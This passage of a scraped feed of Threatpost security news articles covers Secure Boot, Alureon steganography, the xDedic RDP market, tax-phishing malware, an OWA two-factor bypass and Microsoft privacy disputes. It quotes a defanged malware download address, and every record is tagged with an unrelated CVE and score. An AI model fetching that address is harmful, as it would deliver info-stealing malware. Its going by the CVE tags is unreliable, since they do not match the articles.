"https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "[](<https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/>)Microsoft officials are seeking to assuage concerns that its implementation of UEFI in Windows 8 will prevent users from loading non-Microsoft operating systems or applications on their machines. Despite concerns raised by security researchers and open-source advocates about vendor lock-in and other issues arising from the use of a secure boot sequence in the upcoming OS, Microsoft says \u201cthe customer is in control of their PC.\u201d\n\nIn the days since Microsoft began talking about the details of Windows 8 and the security measures that it has added to the new version of the OS, security researchers and others have raised questions about the consequences of the implementation of the secure boot sequence that includes UEFI instead of a traditional BIOS underneath the firmware. The boot sequence for Windows 8, which is due in 2012, will be markedly different from that of its predecessors. The most notable difference is that the firmware will only load code that is signed and authenticated by a key that\u2019s embedded in the PC hardware. Any module that isn\u2019t signed won\u2019t be loaded.\n\nThe goal of this is to prevent malware such as rootkits and bootkits from staying resident on machines and reloading each time the machine is restarted. Such malware variants have become more popular in recent years as attackers have looked for new methods of keeping their attack tools on infected machines for a long period of time. That kind of malware can be difficult to detect and remove, and so Microsoft is hoping that the secure boot sequence using UEFI will help prevent it and other malicious software from making its way onto the PC in the first place.\n\n\u201cIn most PCs today, the pre-operating system environment is vulnerable to attacks by redirecting the boot loader handoff to possible malicious loaders. These loaders would remain undetected to operating system security measures and antimalware software,\u201d Microsoft\u2019s [Tony Mangefeste](<https://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx>) wrote in a post explaining the architectural change.\n\nHowever, critics have raised concerns that the system also gives Microsoft the ability to prevent users from running third-party operating systems such as Linux on their PCs. Ross Anderson, a security researcher at the University of Cambridge, said in a blog post yesterday that the move by Microsoft could have serious consequences.\n\n\u201cThe extension of Microsoft\u2019s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly [unlawful](<http://en.wikipedia.org/wiki/Article_82>) and must not succeed,\u201d Anderson wrote.\n\nMangefeste said that the secure boot sequence is designed to prevent malware from loading and not to stop users from loading other software they want to run, including alternate operating systems.\n\n\u201cAt the end of the day, the customer is in control of their PC. Microsoft\u2019s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves. We work with our OEM ecosystem to provide customers with this flexibility. The security that UEFI has to offer with secure boot means that most customers will have their systems protected against boot loader attacks. For the enthusiast who wants to run older operating systems, the option is there to allow you to make that decision,\u201d Mangefeste wrote.\n\n\u201cA demonstration of this control is found in the Samsung tablet with Windows 8 Developer Preview that was offered to //BUILD/ participants. In the screenshot below you will notice that we designed the firmware to allow the customer to disable secure boot. However, doing so comes at your own risk.\u201d\n", "cvss3": {}, "published": "2011-09-23T15:14:43", "type": "threatpost", "title": "Microsoft Defends Secure Boot in Windows 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:43", "id": "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "href": "https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/75683/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "[](<https://threatpost.com/alureon-rootkit-morphs-again-adds-steganography-092611/>)The [Alureon rootkit](<https://threatpost.com/tdl4-rootkit-bypasses-windows-code-signing-protection-111610/>) has become not just a major headache for its victims, with its insidious infection routines and persistence once on a machine. But it also has proved to be a challenge for researchers engaged in trying to identify new versions and unwind its new tactics and techniques. The latest hurdle thrown up by Alureon is the use of steganography to hide configuration files to update infected machines with new instructions.\n\nThe steganography usage has shown up in a specific version of Alureon that often is downloaded by a Trojan and then installed on the victim\u2019s machine. The malware has a new function that goes out to a remote Web site and downloads a new component called \u201ccom32\u201d, which, once decrypted, presents a list of URLs hosted on LiveJournal and WordPress. Each of the pages simply hosts a series of image files, which look to be harmless at first glance. But when [researchers at Microsoft](<https://blogs.technet.com/b/mmpc/archive/2011/09/25/a-tale-of-grannies-chinese-herbs-tom-cruise-alureon-and-steganography.aspx>) looked deeper into the code that is responsible for retrieving the image files, they discovered that the code looks specifically for some IMG HTML tags.\n\nThe rootkit then tries to pull down the JPEGs, and along with the image data comes a long string of characters that looks to be a password of some kind, according to the analysis by Scott Molenkamp of Microsoft\u2019s Malware Protection Center.\n\n\u201cAfter further investigation, I was able to determine that embedded within each of the JPGs was a complete configuration file using steganography. One of the critical sections of the configuration file contains the list of command and control servers. The purpose of the publically hosted data was revealed \u2014 it\u2019s there to provide a layer of redundancy and defense against existing domains that might become unavailable. In the event that no command and control server could be contacted, Alureon would then seek to retrieve an updated configuration file from these \u2018backup\u2019 locations,\u201d [Molenkamp](<https://blogs.technet.com/b/mmpc/archive/2011/09/25/a-tale-of-grannies-chinese-herbs-tom-cruise-alureon-and-steganography.aspx>) wrote.\n\nThe images being used to hide the configuration file look to be completely random, unless the attacker behind Alureon is a health nut who loves his grandma and \u201cTropic Thunder.\u201d The JPEGs include a picture of an elderly woman, a bowl of something sort of health-food looking and\u2026Tom Cruise.\n\nAlureon, which also is known as TDSS or TDL4, has been a serious problem for a couple of years now. The addition of a steganography routine is just the latest in a line of new features added to the malware in the last few months. Earlier this year researchers came across a version of Alureon that was using an older brute-force technique in order to decrypt some components of its own code that are encrypted. And in June another variant appeared that had its own self-replicating loader which allowed [Alureon to spread via network shares](<https://threatpost.com/tdss-rootkit-gets-its-own-self-replicating-loader-060311/>) once it\u2019s on a victim\u2019s machine.\n", "cvss3": {}, "published": "2011-09-26T15:51:13", "type": "threatpost", "title": "Alureon Rootkit Morphs Again, Adds Steganography", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:42", "id": "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "href": "https://threatpost.com/alureon-rootkit-morphs-again-adds-steganography-092611/75688/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:57", "description": "Dennis Fisher talks with Katie Moussouris of Microsoft about the company\u2019s new [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) for innovative defensive security technology, why Microsoft didn\u2019t start a bug bounty program and whether this will become an annual contest.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-08-24T11:45:50", "type": "threatpost", "title": "Katie Moussouris on the Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T20:01:36", "id": "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "href": "https://threatpost.com/katie-moussouris-microsoft-blue-hat-prize-082411/75575/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:47", "description": "Nearly two-thirds of servers and PCs peddled on the xDedic underground marketplace belong to schools and universities, and most are based in the United States.\n\nIn a [recent analysis of xDedic](<https://www.flashpoint-intel.com/blog/cybercrime/xdedic-rdp-targets/>), Flashpoint found that besides the education sector, PC and servers tied to healthcare and legal firms make up the bulk of the available vulnerable systems.\n\nXDedic is the largest of many platforms cybercriminals use to buy access to compromised servers and PCs that use the Microsoft protocol Remote Desktop Protocol (RDP). Using brute-force password attacks, the xDedic gang has grown the number of available servers and PCs available for access to 85,000, up 10 percent from a year ago, according to Flashpoint.\n\nCriminals charge $50 to access the marketplace via Tor. Once in, criminals can browse thousands of compromised servers and PCs that can be accessed via a remote desktop session. Typically, access to a PC or server can range between $7 to $15, according to Flashpoint.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/06225118/xDedic-Black-Market.jpg>)Once a hacker accesses a remote system they can steal data, move laterally within a corporate network or install malware.\n\n\u201cXDedic is the most prolific of these cybercriminal gangs. They have their own proprietary tools and techniques and have been prospering over the past year,\u201d said Vitali Kremez, senior intelligence analyst at Flashpoint.\n\nIn its research, Flashpoint said the United States, Germany, and Ukraine appear to be the most frequently targeted countries. The most exploited sectors are education, followed by healthcare, legal, aviation, and government. Least vulnerable to these types of attacks are the financial and telecom sectors.\n\n\u201cSchools appear to be the hardest hit because they have the least mature security departments and just can\u2019t effectively mitigate against these type of attacks,\u201d Kremez said. \u201cSchools also sometimes have large banks of RDP systems for students to access and play with.\u201d\n\nWhen it comes to being targeted by these types of attacks, Kremez said, the leading factors are a lack of computer hygiene, the number of external RDP servers available and systems that have notoriously bad passwords.\n\nOver the past year, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) has had its ups and downs. XDedic\u2019s original domain (xdedic[.]biz) disappeared shortly after [a Kaspersky Lab report](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/22070309/xDedic_marketplace_ENG.pdf>) (PDF) published in June described how xDedic provided a platform for the sale of compromised RDP servers. A month later in July, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) resurfaced, this time on a Tor domain, where it remains today.\n\n\u201cMicrosoft Windows is the most popular of the platforms targeted by these type attacks,\u201d Kremez said. \u201cSimply put, Windows is the most prolific system out there. When a criminal is looking to find the biggest easiest target with the highest probability of a successful infiltration, Windows is it,\u201d he said.\n\nAs for Microsoft, Kremez said, it is constantly updating its RDP software to thwart bad guys. \u201cThe weakest link isn\u2019t software. It\u2019s the human factor and a failure to secure servers and client PCs to begin with. Often times people misconfigure their RDP server or give them passwords that are just not adequate.\u201d\n", "cvss3": {}, "published": "2017-04-25T13:45:07", "type": "threatpost", "title": "xDedic Market Spilling Over With School Servers, PCs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-03-22T11:03:12", "id": "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "href": "https://threatpost.com/xdedic-market-spilling-over-with-school-servers-pcs/125202/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and add to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with email subject lines \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warn recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Email with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains a malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Mike Mimoso talks to Cody Pierce, director of vulnerability research and prevention with Endgame, at RSA Conference 2017 about how attackers are changing their techniques in the face of mitigations and continuing to base exploits around legitimate APIs and functions to thwart detection.\n\n[](<https://itunes.apple.com/us/podcast/the-threatpost-podcast/id315355232?mt=2>)[](<https://threatpost.com/category/podcasts/feed/>)\n\nDownload: [Cody_Pierce_on_Exploit_Development.mp3](<http://traffic.libsyn.com/digitalunderground/Cody_Pierce_on_Exploit_Development.mp3>)\n\nMusic by Chris Gonsalves\n", "cvss3": {}, "published": "2017-03-13T10:27:18", "type": "threatpost", "title": "Cody Pierce on the Future of Exploit Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-16T18:24:34", "id": "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "href": "https://threatpost.com/cody-pierce-on-exploit-development/124249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Enterprises running Exchange Server have been operating under a false sense of security with regard to two-factor authentication implementations on Outlook Web Access (OWA) adding an extra layer of protection.\n\nA design weakness has been exposed that can allow an attacker to easily bypass 2FA and access an organization\u2019s email inboxes, calendars, contacts and more.\n\nThe problem lies in the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA and it is [not covered by two-factor authentication](<http://www.blackhillsinfosec.com/?p=5396>). EWS is enabled by default and shares the same port and server as OWA, meaning an attacker with [stolen] credentials can remotely access EWS, which talks to the same backend infrastructure as OWA, and would enable access a user\u2019s inbox.\n\nThe issue was publicly disclosed on Wednesday by researcher Beau Bullock of Black Hills Information Security, a consultancy based in South Dakota. Bullock privately disclosed his findings to Microsoft on Sept. 28, and after an initial acknowledgement, repeated follow-up emails failed to produce a patch or mitigation. Bullock went public yesterday, but shortly thereafter, Microsoft contacted him with a mitigation that would likely break some services that rely on Exchange Web Services, such as thick clients like Outlook for Mac.\n\nBullock told Threatpost that it\u2019s likely Microsoft cannot fix this without re-architecting some parts of the affected infrastructure.\n\n\u201cThe biggest thing is that Outlook Web Access is on the same webserver as Exchange Web Services and they\u2019re both enabled by default. I think the biggest problem is that most people don\u2019t seem to understand that\u2019s the thing that\u2019s happening,\u201d Bullock said. \u201cA lot of people think they have this Exchange server on the Internet and they have it there just for OWA, but the biggest problem is they don\u2019t understand EWS is enabled by default as well. The fix is more widespread awareness that it\u2019s actually there.\u201d\n\nBullock, a penetration tester, believes that there isn\u2019t a lot of awareness that this configuration exists and that organizations aren\u2019t aware that this second protocol is running alongside OWA and is not covered by 2FA.\n\n\u201cThat\u2019s not inherently clear in the documentation that if you enable two-factor authentication on OWA, you have to be careful that you have this other protocol right here that is still only single factor,\u201d Bullock said. \u201cIt talks to same backend infrastructure.\u201d\n\nBullock pointed out that it\u2019s not unusual to have different protocols, such as RDP and SMB, running on the same server where, for example, RDP is covered by two-factor authentication and SMB is not. The two services, however, are not running on the same port, and Bullock points out that an enterprise could create firewall rules to curtail access.\n\n\u201cThat\u2019s why this is more of a serious issue,\u201d Bullock explained. \u201cWhen you expose a server externally, you allow access only to that port. If you don\u2019t know a completely separate protocol is operating on same port, you\u2019re potentially opening up another way to communicate to that infrastructure.\u201d\n\nBullock described in a report published yesterday how he carried out the attack against OWA protected by Duo for Outlook 2FA. \nBy targeting EWS with his test account\u2019s credentials and a pen-testing tool called MailSniper, which connects to Exchange and searches an inbox for sensitive data, Bullock was able to bypass the 2FA protecting OWA. An attacker in a real-world scenario could gain access to a user\u2019s credentials, for example, from any of the tens of millions of credentials dumped online this summer.\n\nTo confirm that this wasn\u2019t an issue with Duo for Outlook, Bullock ran a similar test against Office 365 with Microsoft Azure Multifactor Authentication enabled. Using the same attack, he was able to bypass that 2FA as well, Bullock said.\n\n\u201cThis does not affect Office 365 with multi-factor authentication (MFA) fully enabled. What the blog describes is not a software vulnerability and does not work without user account credentials/stolen passwords,\u201d a Microsoft spokesperson told Threatpost.\n\n\u201cI think in the end, the best solution would be to re-architect it,\u201d Bullock said. \u201cIn the short term, how hard would it be for Microsoft to disable it by default and if an organization actually needed to use EWS for a thick client, then they could enable it. They\u2019re trying to keep all the protocols open and make it easier for deployment.\u201d\n", "cvss3": {}, "published": "2016-11-03T15:15:56", "type": "threatpost", "title": "Outlook Web Access Two-Factor Authentication Bypass Exists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-03T19:15:56", "id": "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "href": "https://threatpost.com/outlook-web-access-two-factor-authentication-bypass-exists/121777/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:54", "description": "The Electronic Frontier Foundation is blasting Microsoft for its \u201cmalicious\u201d and \u201cannoying\u201d tactics when it comes to prodding Windows users to update their operating system to Windows 10.\n\nThe digital watchdog group says Microsoft\u2019s strategy of pushing the Windows 10 upgrade application onto users systems was unwelcome by many and the company crossed the line when users began uninstalling the app and Microsoft reacted by changing the app multiple times and bundling it into various security patches, creating a \u201ccat-and-mouse game to uninstall it,\u201d [wrote Amul Kalia, legal intake coordinator at the EFF](<https://www.eff.org/deeplinks/2016/08/windows-10-microsoft-blatantly-disregards-user-choice-and-privacy-deep-dive>).\n\n\u201cThe tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious,\u201d he said. \u201cThe app couldn\u2019t be easily hidden or removed.\u201d\n\nKalia blames Microsoft\u2019s ambitious stated goal to install Windows 10 on one billion devices by the end of 2018 for its drive to \u201caggressively\u201d push the OS update on users. Officially Microsoft called the update campaign Get Windows 10 (GWX) and offered Windows 7 and 8.1 users the ability to upgrade to Windows 10 for free before July 29, 2016. According to Microsoft, 300 million devices were running Windows 10 in May, but it\u2019s unclear how many upgraded using the GWX app.\n\nWith GWX Microsoft sparked a vocal user backlash from some Windows users who insisted they were forced to upgrade to Windows 10. The hostile response also included four lawsuits against Microsoft for its \u201cquestionable\u201d upgrade tactics. New York Attorney General Eric Schneiderman announced he would be pursuing a GWX investigation as well.\n\nWhen asked to comment on the EFF\u2019s critique of its GWX efforts Microsoft supplied Threatpost with the boilerplate statement: \u201cMicrosoft is committed to customer privacy and ensuring that customers have the information and tools they need to make informed decisions. We listened to feedback from our customers and evolved our approach to the upgrade process. Windows 10 continues to have the highest satisfaction of any version of Windows.\u201d\n\nOriginally, Microsoft pushed the Windows 10 upgrade app via its Windows Update system. Users who received the app had a Windows 10 upgrade icon placed in their system tray that doubled as a way to initiate the OS upgrade download as well as offering an advertisement that boasted new Windows 10 features.\n\nOver time Microsoft became more aggressive, according to the EFF, bundling Windows 10 ads as part of an Internet Explorer security patch. Also criticized was the fact in many instances Microsoft didn\u2019t just download the Windows 10 upgrade app, but also downloaded the entire required Windows 10 installation files (4GB).\n\nBut the EFF maintains on May 2016 Microsoft crossed a line when it changed the expected behavior of a dialog prompt used in a window tied to the Windows 10 upgrade app. \u201cSpecifically, when prompted with a Windows 10 update, if the user chose to decline it by hitting the \u2018X\u2019 in the upper right hand corner, Microsoft interpreted that as consent to download Windows 10,\u201d Kalia wrote.\n\nThe EFF also asserts that with the introduction of the Cortana digital assistant, a feature introduced with Windows 10, Microsoft demonstrated another disturbing behavior pattern and disregarded user privacy under the guise of Cortana customization.\n\n\u201cWindows 10 sends an unprecedented amount of usage data back to Microsoft,\u201d Kalia maintains, including location data, text input, voice input, touch input, webpages you visit, and telemetry data regarding your general usage of your computer, including which programs you run and for how long.\n\nOf course users can disable data sharing features that limit the amount of personal information Microsoft collects. However, the EFF says even those who opt out of sharing data within Windows 10 still can\u2019t escape sharing some data with Microsoft via the operating system\u2019s telemetry reporting.\n\nWindows 10 telemetry, also known as the Universal Telemetry Client (UTC), is \u201csystem data that is uploaded by the Connected User Experience and Telemetry component.\u201d Information shared with Microsoft via UTC includes system uptime and crash data and hardware attributes such as CPU, installed memory, and storage, according to [Windows experts Ed Bott](<http://www.zdnet.com/article/windows-10-telemetry-secrets/>) who has written extensively about Windows 10 telemetry.\n\nUTC can collect personal data as part of a crash report when specific files are the cause of the system failure. Users of Windows 10 Enterprise Edition can turn telemetry data sharing off, but Home and Pro users can\u2019t, the EFF maintains.\n\n\u201cThere\u2019s no doubt that Windows 10 has some great security improvements over previous versions of the operating system. But it\u2019s a shame that Microsoft made users choose between having privacy and security,\u201d Kalia said.\n", "cvss3": {}, "published": "2016-08-18T16:38:30", "type": "threatpost", "title": "EFF Blasts Microsoft Over Windows 10 Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-19T17:00:44", "id": "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "href": "https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:58", "description": "LAS VEGAS \u2014 It wasn\u2019t long ago that ROP, or return-oriented programming, was a hacker\u2019s best friend when it came to bypassing mitigations against memory-based attacks such as DEP and ASLR.\n\nROP, however, is so 2005. In the last couple of years, researchers and attackers have figured out how to bypass popular tools such as Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET), without the need for ROP. Exploit kits, for example have integrated attacks that have moved up the exploitation stack closer to memory and before code is written to disk. All the while, defenders still focus on post-exploitation techniques (i.e., ROP) that are obsolete today.\n\nThis week at Black Hat USA 2016 in Las Vegas, researchers at Endgame are expected to introduce new defensive techniques that could level the playing field. Their approach is called Hardware Assisted Control Flow Integrity (HA-CFI), which leverages features in the micro-architecture of Intel processors, such as the performance monitoring unit (PMU), for security.\n\n\u201cDuring the last two years, academics have been using it for security purposes,\u201d said Cody Pierce, Endgame director of vulnerability research. \u201cWe\u2019re continuing the idea of using hardware features to implement a security check. That\u2019s where CFI comes in and monitors the PMU to get real-time views into protected processes.\u201d\n\nWhere tools such as EMET catch attacks in the post-exploitation stage of an attack, HA-CFI operates in the exploitation stage before bypasses happen.\n\n\u201cIt\u2019s generic in the fact it has no knowledge of exploit techniques, and doesn\u2019t know about ROP; the system is autonomous,\u201d Pierce said. \u201cWhat it\u2019s looking for is an abnormal change in execution. Usually this is the absolute first step of exploits. They will redirect execution from normal- to attacker-controlled execution. That\u2019s a very specific thing that we\u2019re hoping to pick up on.\n\n\u201cAn analogy to malware would be that you would want to pick up detection of malware before it\u2019s written to disk,\u201d Pierce said. \u201cYou don\u2019t want to wait until it runs and sets up persistence and backdoors.\u201d\n\nMicrosoft implemented [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) starting with Visual Studio 2015 and it runs only on x86 and x64 releases on Windows 8.1 and Windows 10. CFG restricts where applications can execute code from, Microsoft said, cutting into the effectiveness of code execution attacks and buffer overflow exploits. Pierce said CFG has its limitations, specifically that can run only on the latest compilers and OSes, requiring organizations to recompile in order to run it. HA-CFI would operate at runtime, and its biggest limitation, Pierce said, is a performance overhead that could be 3x higher than Microsoft\u2019s requiring organizations to consider that tradeoff when protecting commonly exploited apps such as browsers, Office and Flash.\n\nAs for ROP being on life support, a number of prominent researchers have been developing new approaches to mitigation bypasses that are putting those attacks out to pasture. [Yang Yu](<https://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328/>), a two-time [Microsoft bounty winner](<https://threatpost.com/patched-badtunnel-windows-bug-has-extensive-impact/118697/>), really got the ball rolling with a 2014 Black Hat talk called [Write Once, Pwn Anywhere](<https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf>) where he was able to change a value in memory that allowed his attack to bypass native restrictions and execute commands sans ROP. The Hacking Team dump of last summer also showed that other professionals had [moved beyond ROP](<https://threatpost.com/curious-tale-of-a-microsoft-silverlight-zero-day/115873/>) with a slate of attacks that [bypass EMET](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) and other mitigations.\n\n\u201cFrom an exploit writer\u2019s perspective, you don\u2019t want to have to do more work than necessary, and we\u2019ve learned ROP is a little unnecessary,\u201d Pierce said, adding that some of these techniques that have become public in the last 12-18 months have made it easier to develop more powerful exploits.\n\n\u201cWith ROP, usually some work has to be done to get all versions of apps you want to exploit,\u201d Pierce said. \u201cThese advanced approaches eliminate that need.\u201d\n", "cvss3": {}, "published": "2016-08-01T13:00:22", "type": "threatpost", "title": "HA-CFI Technique Checks Mitigation Bypasses Earlier", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-07-29T19:00:17", "id": "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "href": "https://threatpost.com/new-technique-checks-mitigation-bypasses-earlier/119568/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft said it has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at Electronic Privacy Information Center said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nFor the ACLU, it used Microsoft\u2019s lawsuit as an opportunity for Congress to implement reforms on the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI 